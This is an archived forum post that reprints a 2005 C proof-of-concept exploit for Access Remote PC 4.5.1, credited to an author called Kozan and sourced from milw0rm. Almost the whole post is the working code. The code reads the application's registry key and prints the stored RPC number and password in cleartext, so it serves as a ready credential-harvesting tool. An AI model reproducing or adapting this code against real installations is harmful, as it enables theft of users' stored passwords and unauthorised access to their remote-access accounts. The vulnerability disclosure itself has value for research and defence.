Access Remote Pc 4.5.1 Local Password Disclosure

Full Version: Access Remote Pc 4.5.1 Local Password Disclosure

GovernmentSecurity.org > General GSO > Exploit & Vulnerability Mailing List Archives

qcred11

Jul 4 2005, 10:13 PM

QUOTE

Access Remote PC 4.5.1 Local Password Disclosure Exploit

CODE

/*****************************************************************

Access Remote PC 4.5.1 Local Password Disclosure Exploit by Kozan

Application: Access Remote PC 4.5.1 (and probably prior versions)
Vendor: www.access-remote-pc.com

Vulnerable Description: Access Remote PC 4.5.1 discloses passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <windows.h>
#include <stdio.h>

#define BUF 100

int main()
{
HKEY hKey;
char RPCNumber[BUF], Password[BUF];
DWORD dwBuf = BUF;

if( RegOpenKeyEx( HKEY_CURRENT_USER,
"Software\\Access Remote PC\\Client\\Options\\Proxy",
0,
KEY_QUERY_VALUE,
&hKey
) !=ERROR_SUCCESS )
{
fprintf( stdout, "Access Remote PC is not installed on you PC!\n" );
return -1;
}

if( RegQueryValueEx( hKey,
"RPCNumber",
NULL,
NULL,
(BYTE *)&RPCNumber,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( RPCNumber,"Not Found!\n" );

if( RegQueryValueEx( hKey,
"Password",
NULL,
NULL,
(BYTE *)&Password,
&dwBuf
) != ERROR_SUCCESS )
lstrcpy( Password,"Not Found!\n" );

fprintf( stdout, "Access Remote PC 4.5.1 Local Exploit by Kozan\n" );
fprintf( stdout, "Credits to AtmaCA\n" );
fprintf( stdout, "www.netmagister.com - www.spyinstructors.com \n" );
fprintf( stdout, "kozan@netmagister.com\n\n" );
fprintf( stdout, "RPCNumber\t: %s\n", RPCNumber );
fprintf( stdout, "Password\t: %s\n", Password );

return 0;
}

Source: http://www.milw0rm.com/id.php?id=1086

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.